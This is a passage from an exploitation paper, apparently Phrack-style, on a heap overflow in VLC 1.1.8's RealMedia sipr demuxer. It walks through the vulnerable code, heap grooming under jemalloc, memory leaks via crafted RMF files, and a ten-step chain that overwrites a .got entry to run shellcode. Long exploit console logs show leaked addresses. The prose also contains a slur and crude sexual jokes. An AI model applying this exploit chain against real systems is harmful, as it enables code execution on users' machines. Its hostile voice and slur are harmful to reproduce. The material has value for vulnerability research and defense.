packet with multiple subpackets is encountered, its contents are buffered
|
|
until all subpackets have been processed. It's only then when the data
|
|
in sent to your audio card or to any pending output streams ;)
|
|
|
|
Sipr subpacket handling is where the mess begins...
|
|
|
|
|
|
----[ 4.3 - Vulnerability details
|
|
|
|
Every time a new packet is encountered in the input stream, VLC will check
|
|
the track it belongs and figure out the audio codec for the track in
|
|
question. Depending on this information, the appropriate audio demuxer is
|
|
called. For sipr packets, 'DemuxAudioSipr()' is the function responsible
|
|
for this task.
|
|
|
|
|
|
/* modules/demux/real.c:788 */
|
|
static void DemuxAudioSipr(..., real_track_t *tk, ...) {
|
|
...
|
|
|
|
block_t *p_block = tk->p_sipr_packet;
|
|
...
|
|
|
|
/* First occurance of a subpacket for this packet? Create a new block
|
|
* to buffer all the subpackets.
|
|
*
|
|
* Subpackets have a size equal to 'i_frame_size' and 'i_subpacket_h' is
|
|
* their number.
|
|
*/
|
|
if(!p_block) {
|
|
/* (1) */
|
|
p_block = block_New(..., tk->i_frame_size * tk->i_subpacket_h);
|
|
...
|
|
|
|
tk->p_sipr_packet = p_block;
|
|
}
|
|
|
|
/* (2) */
|
|
memcpy(p_block->p_buffer + tk->i_sipr_subpacket_count * tk->i_frame_size,
|
|
p_sys->buffer, tk->i_frame_size);
|
|
...
|
|
|
|
/* Checks that all subpackets for this packet have been processed, if not
|
|
* returns to the demuxer.
|
|
*/
|
|
if(++tk->i_sipr_subpacket_count < tk->i_subpacket_h)
|
|
return;
|
|
...
|
|
|
|
/* All subpackets arrived; send data to all consumers. */
|
|
es_out_Send(p_demux->out, tk->p_es, p_block);
|
|
}
|
|
|
|
|
|
For now assume that 'block_New()', called at (1), is a simple call to
|
|
'malloc()'. Obviously, setting 'i_subpacket_h' to 0 will result in a call
|
|
very similar to 'malloc(0)'. As we have mentioned in our main jemalloc
|
|
paper, a call to 'malloc(0)' returns a region of the smallest size class.
|
|
If 'i_frame_size' is bigger than the minimal space reserved by 'malloc(0)',
|
|
then the call to 'memcpy()' at (2) will result in neighboring heap
|
|
allocations being corrupted (that simple ;p).
|
|
|
|
|
|
----[ 4.4 - 'p_blocks' all over the place
|
|
|
|
Since we have successfully identified the vulnerability, it is time
|
|
to search for possible target structures. Before continuing, we must
|
|
have a look at that 'block_t' structure used to buffer the subpackets;
|
|
its definition can be found at include/vlc_block.h:101.
|
|
|
|
|
|
typedef void (*block_free_t) (block_t *);
|
|
|
|
struct block_t {
|
|
block_t *p_next;
|
|
uint32_t i_flags;
|
|
mtime_t i_pts;
|
|
mtime_t i_dts;
|
|
mtime_t i_length;
|
|
unsigned i_nb_samples;
|
|
int i_rate;
|
|
size_t i_buffer;
|
|
uint8_t *p_buffer;
|
|
block_free_t pf_release;
|
|
};
|
|
|
|
|
|
I know what you're probably thinking; stop staring at that function
|
|
pointer ;) Yes we can very easily overflow it and consequently gain direct
|
|
code execution. Nevertheless, we decided not to take the easy road;
|
|
after all, we are only interested in forcing VLC leak memory contents
|
|
back to us. Assume function pointers have not been discovered yet ;p
|
|
The structure still looks quite promising; notice how 'i_buffer', the
|
|
size of the audio data pointed by the 'p_buffer' pointer, lies before
|
|
'p_buffer' itself... But what exactly is that 'p_buffer' anyway? When
|
|
and how is it allocated?
|
|
|
|
Here's another interesting story regarding audio blocks. Having a look
|
|
at src/misc/block.c, line 99, in function 'block_Alloc()' reveals that
|
|
block headers always lie before the data pointed by 'p_buffer'. When,
|
|
for example, the user requests a block of 16 bytes, 'block_Alloc()' will
|
|
add 16 to the metadata overhead, say N bytes, thus eventually allocating
|
|
16 + N bytes. The 'p_data' pointer will then set to point to the start
|
|
of the actual buffer, right after the 'block_t' header as depicted below.
|
|
|
|
|
|
p_buffer
|
|
.-----.
|
|
| |
|
|
| v
|
|
.---------.----------------------.
|
|
| block_t | ... audio data ... |
|
|
'---------'----------------------'
|
|
|
|
|
|
The relevant code is shown below:
|
|
|
|
|
|
struct block_sys_t {
|
|
block_t self;
|
|
size_t i_allocated_buffer;
|
|
uint8_t p_allocated_buffer[];
|
|
};
|
|
...
|
|
|
|
#define BLOCK_ALIGN 16
|
|
...
|
|
|
|
#define BLOCK_PADDING 32
|
|
...
|
|
|
|
block_t *block_Alloc(size_t i_size) {
|
|
...
|
|
block_sys_t *p_sys;
|
|
uint8_t *buf;
|
|
|
|
#define ALIGN(x) (((x) + BLOCK_ALIGN - 1) & ~(BLOCK_ALIGN - 1))
|
|
|
|
/* (1) */
|
|
const size_t i_alloc = sizeof(*p_sys) + BLOCK_ALIGN +
|
|
(2 * BLOCK_PADDING) + ALIGN(i_size);
|
|
|
|
p_sys = malloc(i_alloc);
|
|
...
|
|
|
|
/* 'buf' is assigned to 'block_t->p_buffer' by 'block_Init()' */
|
|
buf = (void *)ALIGN((uintptr_t)p_sys->p_allocated_buffer);
|
|
buf += BLOCK_PADDING;
|
|
block_Init(&p_sys->self, buf, i_size);
|
|
...
|
|
|
|
return &p_sys->self;
|
|
}
|
|
|
|
|
|
Taking a look back at 'DemuxAudioSipr()', we can see that if
|
|
'i_subpacket_h' is set to 0, then 'block_New()', a macro that is
|
|
substituted with 'block_Alloc()', results in the latter receiving a
|
|
value for 'i_size' equal to 0. Setting 'i_size' to 0 at (1), results in
|
|
'i_alloc' being assigned the value 136. Now do the math; 136 is slightly
|
|
larger than 128 so, it will be serviced by jemalloc's bin for 192-byte
|
|
regions. 192 - 136 = 56; 56 is the size margin for the parameter passed
|
|
to 'block_Alloc()'; for the blocks to be placed one next to the other,
|
|
they must reside in the same size class, so, we must make sure the total
|
|
length of the subpackets does not exceed 56. For a packet containing
|
|
two subpackets, a wise choice is to set 'i_frame_size' to 20, so that 2 *
|
|
20 (< 56) plus the overhead is also serviced by bin-192. Unfortunately,
|
|
'i_frame_size' cannot take arbitrary values; it can only get a set of
|
|
predefined ones with 20 being the smallest.
|
|
|
|
Beautiful! Since 'block_t' allocations are always accompanied by their
|
|
buffer, it means that the 'memcpy()' call at (2) in 'DemuxAudioSipr()',
|
|
when writing past the boundaries of the victim buffer, may actually
|
|
overwrite the header of an adjacent audio block; its 'p_buffer', its
|
|
'i_buffer' and even its function pointer (but let's ignore this fact for
|
|
now; abusing the function pointer is trivial and we decided not to deal
|
|
with it).
|
|
|
|
Now, a few more things to note:
|
|
|
|
1 - We know that if one packet has two, for example, subpackets, then
|
|
its 'p_block' will be alive until all subpackets have been processed;
|
|
when they are no longer needed, they will be freed resulting in a small
|
|
hole in the heap. Obviously, the lifetime of a 'p_block' is directly
|
|
related to the number of its subpackets.
|
|
|
|
2 - Checking at how 'DemuxAudioSipr()' works, reveals that a packet
|
|
with 0 subpackets is treated as if it had 1 subpacket. The 'memcpy()'
|
|
call at (2) will overflow the adjacent heap regions and then, when its
|
|
processing has finished, the packet will be freed by 'es_out_Send()'.
|
|
|
|
By combining the facts above, turns out we can:
|
|
|
|
1 - Use the RMF metadata (MDPR chunks) to define two tracks. Both
|
|
tracks must use the sipr audio codec. Each packet of the first must
|
|
have 2 subpackets and each packet of the second 0 subpackets for the
|
|
vulnerability to be triggered.
|
|
|
|
2 - Force VLC play the first subpacket of a packet of the first track. A
|
|
new 'block_t' will be allocated. In the diagram below, 't1s1' stands for
|
|
'track 1 subpacket 1'.
|
|
|
|
|
|
.---------.-------.
|
|
| block_t | t1s1 |
|
|
'---------'-------'
|
|
|
|
|
|
3 - Force VLC to play the packet of the second track; the one that has
|
|
0 subpackets. A new 'block_t' will eventually be allocated. We have
|
|
to specially prepare the heap so that the new block is placed directly
|
|
behind the one initialized at step 2.
|
|
|
|
|
|
.---------.------..---------.------.
|
|
| block_t | t2s0 || block_t | t1s1 |
|
|
'---------'------''---------'------'
|
|
|
|
|
|
An overflow will take place thus overwriting the block header of the
|
|
block allocated in the previous step. We are interested in overwriting
|
|
the 'p_buffer' to make it point to a memory region of our choice and
|
|
'i_buffer' to the number of bytes we want to be leaked.
|
|
|
|
4 - Feed VLC with the second subpacket for the first track. Since the
|
|
first subpacket was processed at step 2, the old 'block_t' will be
|
|
used. If everything goes fine, its 'p_buffer' will point where we set
|
|
it to and 'i_buffer' will contain a size of our choice. The 'memcpy()'
|
|
call at (2) in 'DemuxAudioSipr()' will write 'i_frame_size' bytes at our
|
|
chosen address thus trashing the memory a bit, but when 'es_out_Send()'
|
|
is called, 'i_buffer' bytes starting at the address 'p_buffer' points to
|
|
will be sent to the soundcard or any output stream requested by the user!
|
|
|
|
Note: Well yeah it wasn't that simple... 'es_out_Send()' calls a hell of
|
|
other functions to process the audio blocks, break them down in smaller
|
|
blocks, forward them to the output streams and so on. Debugging this
|
|
process was a very tiresome task; it became apparent that the target,
|
|
the overflown 'block_t' header had to obey to certain rules so that
|
|
it wasn't discarded. For example, all packets carry a timestamp;
|
|
the timestamp of the overflown block must be within a range of valid
|
|
timestamps, otherwise it's considered stale and dropped!
|
|
|
|
The following logs correspond to one of our early tests; we used a
|
|
specially crafted .rmf file to leak 65k of data starting at the binary's
|
|
.data section.
|
|
|
|
[hk@lsd ~/src/vlc_exp/leak]$ cat youporn.sh
|
|
vlc leak.rmf :sout='#std{access=file,mux=raw,dst=leaked_data.rmf}' \
|
|
vlc://quit
|
|
|
|
[hk@lsd ~/src/vlc_exp/leak]$ source youporn.sh
|
|
VLC media player 1.1.8 The Luggage (revision exported)
|
|
...
|
|
[hk@lsd ~/src/vlc_exp/leak]$ ls -lah leaked_data.rmf
|
|
-rwxr-xr-x 1 hk hk 128K Mar 31 22:27 leaked_data.rmf
|
|
|
|
We got back 128k which is about twice as much as we requested. In fact,
|
|
the useful data is 65k; it just happens that it's written in the output
|
|
file twice (minor detail related to block buffering).
|
|
|
|
Careful readers would have probably noticed that we took for granted that
|
|
the victim block will be allocated right before the target. Such a result
|
|
can easily be achieved. The technique we use in our exploit is very
|
|
similar to one of the techniques used in browser exploitation. Briefly,
|
|
we create several tracks (more than 2000) holding packets of 2 subpackets
|
|
of 20 bytes each so that all packets end up being allocated in bin-192. We
|
|
then force the release of two consecutive allocations thus creating two
|
|
adjacent holes in the heap. Then, by following what was said so far,
|
|
we can achieve a reliable information disclosure. Our tests show that
|
|
we can repeat this process around 40 times before VLC crashes (yet this
|
|
is only statistics, beautiful Greek statistics ;p).
|
|
|
|
|
|
----[ 4.5 - RMF summary
|
|
|
|
It's now time to sum up the information leak process. For a successful
|
|
information disclosure, the attacker must perform the following steps:
|
|
|
|
1 - Create 2000 + 1 + 1 tracks. 2000 will be used for heap spraying,
|
|
1 will act as the target and 1 as the victim. The lots of allocations
|
|
will probably result in a new magazine being populated thus guaranteeing
|
|
that new allocations will be returned in the reverse memory order.
|
|
|
|
2 - Force the deallocation of two packets belonging to two consecutive
|
|
tracks. Two adjacent holes will be created. The packet lower in memory
|
|
must be freed first.
|
|
|
|
3 - Play the first subpacket of the target track. The hole in the higher
|
|
address will be assigned to the new block.
|
|
|
|
4 - Play the packet of the victim track. The new block will be given the
|
|
lower heap hole and the overflow will reach the block allocated at step 3.
|
|
|
|
5 - Play the second subpacket of the target track. The memory we want
|
|
to read will be trashed by 20 bytes (= frame size) and then returned in
|
|
the output stream.
|
|
|
|
6 - Watch the epic faggotry evolving in front of your eyes ;)
|
|
|
|
|
|
--[ 5 - Building a reliable exploit
|
|
|
|
----[ 5.1 - Overall process
|
|
|
|
Building a reliable local exploit involves combining all the facts
|
|
and finding a way to locate, within the target process, all pieces of
|
|
information required to achieve code execution. Remember that we don't
|
|
want the user having to manually find any return addresses, return
|
|
locations and so on. The exploit must be autonomous and self contained;
|
|
all required information must be automatically detected.
|
|
|
|
When it comes to the MP4 vulnerability, things are pretty straightforward;
|
|
we just need to figure out where 'p_root' is and then free it.
|
|
Additionally, we need to figure out what value 'p_moov' must be overwritten
|
|
with (i.e. the address of an appropriate .got entry). MP4 exploitation is
|
|
100% reliable; once we have found the values of those two parameters, code
|
|
execution is matter of feeding VLC with a specially crafted MP4 file. For
|
|
more information the reader can have a look at the attached source code and
|
|
more specifically at 'mp4.py'; a Python class used to create those special
|
|
MP4 files that can crash VLC as well as innocent ones that cause no
|
|
problems. The latter are used to force VLC load 'libmp4_plugin.so' during
|
|
the very first step of the exploitation process.
|
|
|
|
Briefly the exploit we developed performs the following steps:
|
|
|
|
1 - Forces VLC to play an innocent MP4 file so that the target plugin
|
|
is loaded.
|
|
|
|
2 - Parses the ELF headers of the VLC binary in order to locate the
|
|
absolute address of its .got section.
|
|
|
|
3 - Uses a specially crafted RMF file to leak 65k starting at the address
|
|
of the binary's .got.
|
|
|
|
4 - The second entry in the .got table points to the linkmap; a linked
|
|
list that keeps track of the loaded libraries populated by the loader
|
|
on each call to 'dlopen()'. Each entry holds the name of a library, the
|
|
address it's mapped at and so on. We proceed by leaking 1MB of data
|
|
starting from the address of the first linkmap entry.
|
|
|
|
5 - Step 4 is repeated until 'libmp4_plugin.so' is detected in the leaked
|
|
data. VLC loads more than 100 libraries; there's no need to locate them
|
|
all. Once we got the MP4 plugin entry, we can figure out where exactly
|
|
it has been loaded.
|
|
|
|
6 - By statically inspecting the MP4 plugin and by using the information
|
|
collected at step 5, we can find the absolute address of its .got. The MP4
|
|
vulnerability is triggered within this .so; consequently the overwrite
|
|
must take place within its local .got.
|
|
|
|
7 - The relocation entries, the string table and the symbol table
|
|
indicated by the .dynamic section of the MP4 plugin can be properly
|
|
combined to figure out what .got entry corresponds to what symbol name. We
|
|
choose to overwrite the .got entry for 'memset()' (more on this later).
|
|
The absolute address of the 'memset()' .got entry is then calculated
|
|
and used as the value that will be written in 'p_moov'.
|
|
|
|
8 - A set of possible addresses for 'p_root' is created by leaking and
|
|
analyzing specific heap regions. This step is further analyzed later.
|
|
|
|
9 - A final MP4 file is created. The MP4 file frees all 'p_root'
|
|
candidates, uses 'chpl' boxes containing the shellcode to force jemalloc
|
|
give the original 'p_root' region back and lands VLC on the 'unlink()'
|
|
style pointer exchange. The address of 'p_root', which now contains user
|
|
supplied data, is written in the .got entry of 'memset()'.
|
|
|
|
10 - Shellcode is executed, much rejoicing is had ;)
|
|
|
|
So why did we choose to hook 'memset()'? Turns out that once the MP4 file
|
|
parsing has finished and the 'unlink()' tyle code has been triggered,
|
|
VLC calls 'MP4_BoxDumpStructure()' to print the layout of the MP4 file
|
|
(this is always done by default; no verbose flags required). Since we
|
|
have corrupted the boxes, 'MP4_BoxDumpStructure()' may access invalid
|
|
memory and thus segfault. To avoid such a side effect, we have to hook
|
|
the first external function call. As shown below, this call corresponds to
|
|
'memset()' which suits us just fine ;)
|
|
|
|
|
|
static void __MP4_BoxDumpStructure(..., MP4_Box_t *p_box, ...)
|
|
{
|
|
MP4_Box_t *p_child;
|
|
|
|
if( !i_level )
|
|
{
|
|
...
|
|
}
|
|
else
|
|
{
|
|
...
|
|
memset(str, ' ', sizeof(str));
|
|
}
|
|
...
|
|
|
|
p_child = p_box->p_first;
|
|
while(p_child)
|
|
{
|
|
__MP4_BoxDumpStructure(..., p_child, ...);
|
|
p_child = p_child->p_next;
|
|
}
|
|
}
|
|
|
|
|
|
----[ 5.2 - Detecting 'p_root' address candidates
|
|
|
|
At first we thought that this would be the easier part of the exploitation
|
|
process; it turned out that it was actually the most difficult. Our first
|
|
idea was to play an MP4 file several times and then leak memory in the
|
|
hope that certain 'MP4_Box_t' signatures may be present somewhere in the
|
|
heap. Unfortunately, the 64-byte allocations used by the MP4 plugin, are
|
|
later used by the RMF parser thus destroying any useful evidence. After
|
|
long nights and lots of tests, we came up with the following technique
|
|
which turned out to be successful:
|
|
|
|
Briefly, we do the following:
|
|
|
|
1 - We leak 65k of data by overwriting 'i_buffer' and leaving 'p_buffer'
|
|
at its present value. This way we read memory contents starting from
|
|
the address that the victim 'p_block' is located.
|
|
|
|
2 - As we have already discussed, the 'p_blocks' created by our RMF file
|
|
are 192 bytes long, so, they lie within runs serviced by bin-192. Leaking
|
|
data from where 'p_buffer' points, results in neighboring runs being
|
|
leaked as well.
|
|
|
|
3 - In our jemalloc article we mentioned that (a) runs are PAGE_SIZE
|
|
aligned and (b) run headers start with a pointer to the corresponding
|
|
bin. We analyze the leaked data and try to locate PAGE_SIZE aligned
|
|
addresses that start with something that looks like a bin pointer
|
|
(0x0804yyyy, some bytes after the main binary's .bss section).
|
|
|
|
4 - We leak 65k starting from the binary's .bss section. The bins array
|
|
of the main arena lies somewhere around. We analyze the data and locate
|
|
the address of bin-64.
|
|
|
|
5 - We leak about 7-8MB of commonly used heap regions. Since we now
|
|
know the address of bin-64, we try to locate all runs that start with
|
|
a pointer pointing at it, that is, runs that contain 64byte regions.
|
|
|
|
6 - All regions in these runs will be freed by our MP4 file; 'p_root'
|
|
is probably one of them.
|
|
|
|
|
|
--[ 6 - Demonstration
|
|
|
|
An art of exploitation paper serves nothing without the proper show off ;)
|
|
This section was specially prepared to be hard sex for your eyes. We were
|
|
very careful and, in fact, we spent many hours trying to figure out the
|
|
leetest shellcode to use, but we couldn't come up with something more
|
|
perfect than 'int3'.
|
|
|
|
|
|
[hk@lsd ~]$ gdb -q vlc
|
|
Reading symbols from xxx/bin/vlc...done.
|
|
(gdb) run --rc-host 127.0.0.1:8080
|
|
Starting program: xxx/bin/vlc --rc-host 127.0.0.1:8080
|
|
...
|
|
|
|
|
|
Let's run the exploit. The actual output may differ since the logs shown
|
|
below do not correspond to the latest version of our code (oh and by
|
|
the way, we are not fucking Python experts).
|
|
|
|
|
|
[hk@lsd ~]$ python main.py
|
|
usage: main.py <vlc_install_prefix> [<rc_port>]
|
|
[hk@lsd ~]$ python main.py xxx/ 8080
|
|
[~] Forcing VLC to load libmp4_plugin.so
|
|
[~] Playing MP4 file 1 times
|
|
.ok
|
|
[~] .got address for VLC binary is 0x0804ad60
|
|
[~] .got address for MP4 plugin is 0x00025e1c
|
|
[~] Index of memset() in MP4's .got is 35
|
|
[~] Requesing memory leak of .got
|
|
[~] Leaking 65535 bytes 0x0804ad60-0x0805ad5f
|
|
[~] Summary of our memory view
|
|
001 0x0804ad60-0x0805ad4a (65515 bytes)
|
|
[~] Got 65515 bytes of useful data
|
|
[~] Saving .got data in got.bin
|
|
[~] Guessed linkmap address is 0x28088000
|
|
[~] Requesting memory leak of linkmap
|
|
[~] Leaking 4194304 bytes 0x28086000-0x28486000
|
|
[~] Summary of our memory view
|
|
001 0x0804ad60-0x0805ad4a (65515 bytes)
|
|
002 0x28086000-0x28485feb (4194284 bytes)
|
|
[~] Got 4194284 bytes of useful data
|
|
[~] Saving linkmap partial data in linkmap-0x28086000.bin
|
|
001 0x08048000-0x00000000 unknown-0x08048000-0x00000000
|
|
002 0x2808e000-0x2817a084 libc.so.7
|
|
003 0x281a5000-0x281b95b4 libvlc.so.7
|
|
004 0x281bd000-0x28286234 libvlccore.so.4
|
|
005 0x282a7000-0x282e3c14 libdbus-1.so.3
|
|
006 0x282ed000-0x282f0814 librt.so.1
|
|
007 0x282f2000-0x28305a84 libm.so.5
|
|
008 0x2830c000-0x2831d334 libthr.so.3
|
|
009 0x28321000-0x28327d44 libintl.so.9
|
|
010 0x2832a000-0x28343eb4 libiconv.so.3
|
|
011 0x2842c000-0x2842ea84 liboss_plugin.so
|
|
012 0x28430000-0x28431734 libmemcpymmxext_plugin.so
|
|
013 0x28433000-0x284401b4 libaccess_bd_plugin.so
|
|
014 0x28442000-0x28443764 libaccess_mmap_plugin.so
|
|
015 0x28445000-0x28447c64 libfilesystem_plugin.so
|
|
016 0x2844a000-0x2844bc24 libdecomp_plugin.so
|
|
017 0x2844d000-0x2844ebd4 libstream_filter_rar_plugin.so
|
|
018 0x28450000-0x284563e4 libzip_plugin.so
|
|
019 0x28458000-0x28464a04 libz.so.5
|
|
020 0x2846a000-0x2846b244 libstream_filter_record_plugin.so
|
|
021 0x2846d000-0x2847e994 libplaylist_plugin.so
|
|
022 0x28482000-0x28483414 libxml_plugin.so
|
|
023 0x29300000-0x29402fb4 libxml2.so.5
|
|
024 0x28485000-0x2848a9c4 libhotkeys_plugin.so
|
|
025 0x2848d000-0x2848e384 libinhibit_plugin.so
|
|
026 0x28490000-0x28490fb4 libsignals_plugin.so
|
|
027 0x28493000-0x28494bd4 libglobalhotkeys_plugin.so
|
|
028 0x28497000-0x284982c4 libxcb-keysyms.so.1
|
|
029 0x2849a000-0x284af254 libxcb.so.2
|
|
030 0x284b2000-0x284b3754 libXau.so.6
|
|
031 0x284b5000-0x284b7b14 libXdmcp.so.6
|
|
032 0x284ba000-0x284ba574 libpthread-stubs.so.0
|
|
033 0x284bc000-0x284c43f4 liboldrc_plugin.so
|
|
034 0x284c8000-0x284e9da4 libmp4_plugin.so
|
|
[~] MP4 plugin is mmap'ed at 0x284c8000-0x284e9da4
|
|
[~] Absolute .got address for MP4 plugin at 0x284ede1c
|
|
[~] .got address of memset() is 0x284edea8
|
|
[~] .bss address for VLC binary is 0x0804adec
|
|
[~] Searching for bin[] address candidates
|
|
[~] Leaking 131070 bytes from current location
|
|
[~] Got 131050 bytes of useful data
|
|
0x0804c0a0...ok
|
|
[~] Leaking 65535 bytes 0x0804adec-0x0805adeb
|
|
[~] Summary of our memory view
|
|
001 0x0804ad60-0x0805ad4a (65515 bytes)
|
|
002 0x28086000-0x28485feb (4194284 bytes)
|
|
003 0x0804adec-0x0805add6 (65515 bytes)
|
|
[~] Got 65515 bytes of useful data
|
|
[~] bin-64 runcur at 0x2891a000, bin address 0x0804bfd8
|
|
[~] Playing MP4 file 16 times
|
|
................ok
|
|
[~] Leaking 7340032 bytes 0x28700000-0x28e00000
|
|
[~] Summary of our memory view
|
|
001 0x0804ad60-0x0805ad4a (65515 bytes)
|
|
002 0x28086000-0x28485feb (4194284 bytes)
|
|
003 0x0804adec-0x0805add6 (65515 bytes)
|
|
004 0x28700000-0x28dfffeb (7340012 bytes)
|
|
[~] Got 7340012 bytes of useful data
|
|
[~] Trying to locate target runs for bin-64 at 0x0804c0a0
|
|
64byte region run at 0x28912000
|
|
64byte region run at 0x28919000
|
|
64byte region run at 0x2891a000
|
|
64byte region run at 0x28933000
|
|
64byte region run at 0x289fc000
|
|
64byte region run at 0x289fd000
|
|
64byte region run at 0x289fe000
|
|
64byte region run at 0x28b32000
|
|
64byte region run at 0x28b33000
|
|
64byte region run at 0x28b34000
|
|
64byte region run at 0x28b36000
|
|
64byte region run at 0x28b37000
|
|
64byte region run at 0x28b38000
|
|
64byte region run at 0x28b39000
|
|
64byte region run at 0x28b3a000
|
|
64byte region run at 0x28b3b000
|
|
64byte region run at 0x28bac000
|
|
64byte region run at 0x28bad000
|
|
64byte region run at 0x28bae000
|
|
64byte region run at 0x28baf000
|
|
[~] Constructing final MP4 payload
|
|
[~] Will free the following memory regions
|
|
0x28912080...0x289120c0...0x28912100...0x28912140...0x28912180...
|
|
0x289121c0...0x28912200...0x28912240...0x28912280...0x289122c0...
|
|
0x28912300...0x28912340...0x28912380...0x289123c0...0x28912400...
|
|
0x28912440...0x28912480...0x289124c0...0x28912500...0x28912540...
|
|
0x28912580...0x289125c0...0x28912600...0x28912640...0x28912680...
|
|
0x289126c0...0x28912700...0x28912740...0x28912780...0x289127c0...
|
|
0x28912800...0x28912840...0x28912880...0x289128c0...0x28912900...
|
|
0x28912940...0x28912980...0x289129c0...0x28912a00...0x28912a40...
|
|
0x28912a80...0x28912ac0...0x28912b00...0x28912b40...0x28912b80...
|
|
0x28912bc0...0x28912c00...0x28912c40...0x28912c80...0x28912cc0...
|
|
0x28912d00...0x28912d40...0x28912d80...0x28912dc0...0x28912e00...
|
|
0x28912e40...0x28912e80...0x28912ec0...0x28912f00...0x28912f40...
|
|
0x28912f80...0x28912fc0...0x28919080...0x289190c0...0x28919100...
|
|
0x28919140...0x28919180...0x289191c0...0x28919200...0x28919240...
|
|
0x28919280...0x289192c0...0x28919300...0x28919340...0x28919380...
|
|
0x289193c0...0x28919400...0x28919440...0x28919480...0x289194c0...
|
|
0x28919500...0x28919540...0x28919580...0x289195c0...0x28919600...
|
|
0x28919640...0x28919680...0x289196c0...0x28919700...0x28919740...
|
|
0x28919780...0x289197c0...0x28919800...0x28919840...0x28919880...
|
|
0x289198c0...0x28919900...0x28919940...0x28919980...0x289199c0...
|
|
0x28919a00...0x28919a40...0x28919a80...0x28919ac0...0x28919b00...
|
|
0x28919b40...0x28919b80...0x28919bc0...0x28919c00...0x28919c40...
|
|
0x28919c80...0x28919cc0...0x28919d00...0x28919d40...0x28919d80...
|
|
0x28919dc0...0x28919e00...0x28919e40...0x28919e80...0x28919ec0...
|
|
0x28919f00...0x28919f40...0x28919f80...0x28919fc0...0x2891a080...
|
|
0x2891a0c0...0x2891a100...0x2891a140...0x2891a180...0x2891a1c0...
|
|
0x2891a200...0x2891a240...0x2891a280...0x2891a2c0...0x2891a300...
|
|
0x2891a340...0x2891a380...0x2891a3c0...0x2891a400...0x2891a440...
|
|
0x2891a480...0x2891a4c0...0x2891a500...0x2891a540...0x2891a580...
|
|
0x2891a5c0...0x2891a600...0x2891a640...0x2891a680...0x2891a6c0...
|
|
0x2891a700...0x2891a740...0x2891a780...0x2891a7c0...0x2891a800...
|
|
0x2891a840...0x2891a880...0x2891a8c0...0x2891a900...0x2891a940...
|
|
0x2891a980...0x2891a9c0...0x2891aa00...0x2891aa40...0x2891aa80...
|
|
0x2891aac0...0x2891ab00...0x2891ab40...0x2891ab80...0x2891abc0...
|
|
0x2891ac00...0x2891ac40...0x2891ac80...0x2891acc0...0x2891ad00...
|
|
0x2891ad40...0x2891ad80...0x2891adc0...0x2891ae00...0x2891ae40...
|
|
0x2891ae80...0x2891aec0...0x2891af00...0x2891af40...0x2891af80...
|
|
0x2891afc0...0x28933080...0x289330c0...0x28933100...0x28933140...
|
|
0x28933180...0x289331c0...0x28933200...0x28933240...0x28933280...
|
|
0x289332c0...0x28933300...0x28933340...0x28933380...0x289333c0...
|
|
0x28933400...0x28933440...0x28933480...0x289334c0...0x28933500...
|
|
0x28933540...0x28933580...0x289335c0...0x28933600...0x28933640...
|
|
0x28933680...0x289336c0...0x28933700...0x28933740...0x28933780...
|
|
0x289337c0...0x28933800...0x28933840...0x28933880...0x289338c0...
|
|
0x28933900...0x28933940...0x28933980...0x289339c0...0x28933a00...
|
|
0x28933a40...0x28933a80...0x28933ac0...0x28933b00...0x28933b40...
|
|
0x28933b80...0x28933bc0...0x28933c00...0x28933c40...0x28933c80...
|
|
0x28933cc0...0x28933d00...0x28933d40...0x28933d80...0x28933dc0...
|
|
0x28933e00...0x28933e40...0x28933e80...0x28933ec0...0x28933f00...
|
|
0x28933f40...0x28933f80...0x28933fc0...0x289fc080...0x289fc0c0...
|
|
0x289fc100...0x289fc140...0x289fc180...0x289fc1c0...0x289fc200...
|
|
0x289fc240...0x289fc280...0x289fc2c0...0x289fc300...0x289fc340...
|
|
0x289fc380...0x289fc3c0...0x289fc400...0x289fc440...0x289fc480...
|
|
0x289fc4c0...0x289fc500...0x289fc540...0x289fc580...0x289fc5c0...
|
|
0x289fc600...0x289fc640...0x289fc680...0x289fc6c0...0x289fc700...
|
|
0x289fc740...0x289fc780...0x289fc7c0...0x289fc800...0x289fc840...
|
|
0x289fc880...0x289fc8c0...0x289fc900...0x289fc940...0x289fc980...
|
|
0x289fc9c0...0x289fca00...0x289fca40...0x289fca80...0x289fcac0...
|
|
0x289fcb00...0x289fcb40...0x289fcb80...0x289fcbc0...0x289fcc00...
|
|
0x289fcc40...0x289fcc80...0x289fccc0...0x289fcd00...0x289fcd40...
|
|
0x289fcd80...0x289fcdc0...0x289fce00...0x289fce40...0x289fce80...
|
|
0x289fcec0...0x289fcf00...0x289fcf40...0x289fcf80...0x289fcfc0...
|
|
0x289fd080...0x289fd0c0...0x289fd100...0x289fd140...0x289fd180...
|
|
0x289fd3c0...0x289fd400...0x289fd440...0x289fd480...0x289fd4c0...
|
|
0x289fd500...0x289fd540...0x289fd580...0x289fd5c0...0x289fd600...
|
|
0x289fd640...0x289fd680...0x289fd6c0...0x289fd700...0x289fd740...
|
|
0x289fd780...0x289fd7c0...0x289fd800...0x289fd840...0x289fd880...
|
|
0x289fd8c0...0x289fd900...0x289fd940...0x289fd980...0x289fd9c0...
|
|
0x289fda00...0x289fda40...0x289fda80...0x289fdac0...0x289fdb00...
|
|
0x289fdb40...0x289fdb80...0x289fdbc0...0x289fdc00...0x289fdc40...
|
|
0x289fdc80...0x289fdcc0...0x289fdd00...0x289fdd40...0x289fdd80...
|
|
0x289fddc0...0x289fde00...0x289fde40...0x289fde80...0x289fdec0...
|
|
0x289fdf00...0x289fdf40...0x289fdf80...0x289fdfc0...0x289fe080...
|
|
0x289fe0c0...0x289fe100...0x289fe140...0x289fe180...0x289fe1c0...
|
|
0x289fe200...0x289fe240...0x289fe280...0x289fe2c0...0x289fe300...
|
|
0x289fe340...0x289fe380...0x289fe3c0...0x289fe400...0x289fe440...
|
|
0x289fe480...0x289fe4c0...0x289fe500...0x289fe540...0x289fe580...
|
|
0x289fe5c0...0x289fe600...0x289fe640...0x289fe680...0x289fe6c0...
|
|
0x289fe700...0x289fe740...0x289fe780...0x289fe7c0...0x289fe800...
|
|
0x289fe840...0x289fe880...0x289fe8c0...0x289fe900...0x289fe940...
|
|
0x289fe980...0x289fe9c0...0x289fea00...0x289fea40...0x289fea80...
|
|
0x289feac0...0x289feb00...0x289feb40...0x289feb80...0x289febc0...
|
|
0x289fec00...0x289fec40...0x289fec80...0x289fecc0...0x289fed00...
|
|
0x289fed40...0x289fed80...0x289fedc0...0x289fee00...0x289fee40...
|
|
0x289fee80...0x289feec0...0x289fef00...0x289fef40...0x289fef80...
|
|
0x289fefc0...0x28b32080...0x28b320c0...0x28b32100...0x28b32140...
|
|
0x28b32180...0x28b321c0...0x28b32200...0x28b32240...0x28b32280...
|
|
